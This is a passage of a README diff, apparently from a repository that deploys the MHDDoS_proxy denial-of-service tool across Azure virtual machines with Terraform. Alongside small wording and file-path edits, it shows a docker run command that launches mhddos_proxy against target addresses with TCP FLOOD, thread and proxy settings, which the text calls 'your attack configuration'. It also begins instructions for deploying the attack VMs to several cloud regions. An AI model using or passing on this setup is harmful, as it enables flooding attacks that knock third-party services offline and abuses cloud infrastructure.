djebos/mhddos-azure-terraform/README.md

   - "docker run --name mhddosProxy -d --rm ghcr.io/porthole-ascend-cinnamon/mhddos_proxy tcp://1.2.3.4:80 tcp://1.1.1.1:443 -t 3000 -p 300 --rpc 50 --http-methods TCP FLOOD --debug"
 # here 'tcp://1.1.1.1:443 -t 3000 -p 300 --rpc 50 --http-methods TCP FLOOD --debug' is your attack configuration that fully compliant with MHDDOS_PROXY
 ```
-Save the `cloud-init.yaml` file.
+Save the `./modules/vms/cloud-init.yaml` file.

 ## Automatic flow
 Automatic flow is preferred for those who aren't familiar with `terraform`.
-If you're on Windows PC you have to use
+If you're on Windows PC, you have to use
 linux terminal such as `Cygwin` or `Git Bash`.
 4. Deploy VMs to the specified regions passed as arguments to the `./start-by-regions.sh`:
 ```shell